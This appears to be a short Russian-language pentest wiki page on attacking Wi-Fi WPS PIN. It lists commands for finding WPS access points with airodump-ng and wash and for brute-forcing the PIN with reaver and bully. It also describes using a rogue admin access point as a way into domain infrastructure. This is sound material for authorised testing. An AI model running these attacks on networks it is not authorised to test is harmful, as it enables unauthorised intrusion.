WPS

Одна из самых недооцененных техник. Получаем доступ к точке доступа без перехвата хэндшейка.

Разведка

Для того, чтобы чекнуть наличие WPS можно использовать airodump-ng:

sudo airodump-ng wlan0 --wps

Также можно использовать wash:

sudo wash -i wlan0

После того как определили, что WPS доступен по PIN-коду приступаем к атаке:

Атака

Reaver

sudo reaver -b <MAC> -i wlan0 -v

Bully

Если вдруг пароль не восстановился, но мы смогли узнать pin:

sudo bully -B -p

Router Sacn by Stas'M

Также можно использовать тулзу для Windows, но только с внешним адаптером:

Router Scan by Stas'M

Лучшая штука для WPS.

Заметки

На самом деле уже давно производители начали отказываться от WPS по PIN-коду. Но все равно встречаются старые устройства с этой технологией. Самый частый кейс в моей практике - несанкционированная точка доступа, которую подняли админы чтобы у них был Wi-Fi. Берем эту точку, получаем доступ к доменной инфраструктуре, зачастую с расширенными привилегиями, так как точка админов.

Если получилось не забываем сказать "шалость удалась".

PreviousWPA-Enterprise NextPMKID

Last updated 9 months ago